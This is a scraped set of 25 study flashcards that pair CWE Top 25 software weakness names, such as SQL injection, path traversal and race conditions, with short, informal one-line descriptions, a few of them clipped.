Reading...
Play button
Play button
Use LEFT and RIGHT arrow keys to navigate between flashcards;
Use UP and DOWN arrow keys to flip the card;
H to show hint;
A reads text to speech;
25 Cards in this Set
- Front
- Back
|
ailure to Preserve Web Page Structure ('Cross-site Scripting')
|
Attackers can inject JavaScript or other browser-executable content into a web page that your application generates.
|
|
|
Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
|
Attackers can influence the SQL that you use to communicate with your database and then suddenly all your fun and profit belongs to them.
|
|
|
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
|
Copying an untrusted input without checking the size of that input is the simplest error to make in a time
|
|
|
Cross-Site Request Forgery (CSRF)
|
It is like that strange package, except the attacker tricks a user into activating a request that goes to your site.
|
|
|
Improper Access Control (Authorization)
|
If you don't ensure that your software's users are only doing what they're allowed to, then attackers will try to exploit your improper authorization and exercise unauthorized functionality that you only intended for restricted users.
|
|
|
Reliance on Untrusted Inputs in a Security Decision
|
Software developers often rely on untrusted inputs in the same way, and when these inputs are used to decide whether to grant access to restricted resources, trouble is just around the corner.
|
|
|
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
|
An attacker could combine multiple ".." or similar sequences to cause the operating system to navigate out of the restricted directory, and into the rest of the system.
|
|
|
Unrestricted Upload of File with Dangerous Type
|
But the name of the uploaded file could contain a dangerous extension such as .php instead of .gif, or other information (such as content type) may cause your server to treat the image like a big honkin' program.
|
|
|
Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
|
When you invoke another program on the operating system, but you allow untrusted inputs to be fed into the command string that you generate for executing that program, then you are inviting attackers to cross that bridge into a land of riches by executing their own commands instead of yours.
|
|
|
Missing Encryption of Sensitive Data
|
Whenever sensitive data is being stored or transmitted anywhere outside of your control, attackers may be looking for ways to get to it.
|
|
|
Use of Hard-coded Credentials
|
Hard-coding a secret password or cryptograpic key into your program is bad manners, even though it makes it extremely convenient - for skilled reverse engineers.
|
|
|
Buffer Access with Incorrect Length Value
|
One programming equivalent for this insult is to access memory buffers using an incorrect length value.
|
|
|
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
|
you can make a lot of smaller parts of a document (or program), then combine them all together into one big document (or program) by "including" or "requiring" those smaller pieces.
|
|
|
Improper Validation of Array Index
|
If you use untrusted inputs when calculating an index into an array, then an attacker could provide an index that is outside the boundaries of the array.
|
|
|
Improper Check for Unusual or Exceptional Conditions
|
If you always expect the worst, then you'll be better prepared for attackers who seek to inflict their worst.
|
|
|
Information Exposure Through an Error Message
|
The secrets could cover a wide range of valuable data, including personally identifiable information (PII), authentication credentials, and server configuration.
|
|
|
Integer Overflow or Wraparound
|
In the real world, 255+1=256. But to a computer program, sometimes 255+1=0, or 0-1=65535, or maybe 40,000+40,000=14464.
|
|
|
Incorrect Calculation of Buffer Size
|
Any number of problems could produce the incorrect calculation, but when all is said and done, you're going to run head-first into the dreaded buffer overflow.
|
|
|
Missing Authentication for Critical Function
|
Software may expose certain critical functionality with the assumption that nobody would think of trying to do anything but break in through the front door. But attackers know how to case a joint and figure out alternate ways of getting into a system.
|
|
|
Download of Code Without Integrity Check
|
Attackers can hack the download site, impersonate it with DNS spoofing or cache poisoning, convince the system to redirect to a different site, or even modify the code in transit as it crosses the network. This scenario even applies to cases in which your own product downloads and installs its own updates.
|
|
|
Incorrect Permission Assignment for Critical Resource
|
It's rude to take something without asking permission first, but impolite users (i.e., attackers) are willing to spend a little time to see what they can get away with.
|
|
|
Allocation of Resources Without Limits or Throttling
|
The lack of control over resource allocation is an avenue for attackers to cause a denial of service against other users of your software, possibly the entire system - and in some cases, this can be leveraged to conduct other more devastating attacks.
|
|
|
URL Redirection to Untrusted Site ('Open Redirect')
|
Many web applications have implemented redirect features that allow attackers to specify an arbitrary URL to link to, and the web client does this automatically.
|
|
|
Use of a Broken or Risky Cryptographic Algorithm
|
You might think you created a brand-new algorithm that nobody will figure out, but it's more likely that you're reinventing a wheel that falls off just before the parade is about to start.
|
|
|
Race Condition
|
Attacker can consciously be looking to exploit them to cause chaos or get your application to cough up something valuable.
|
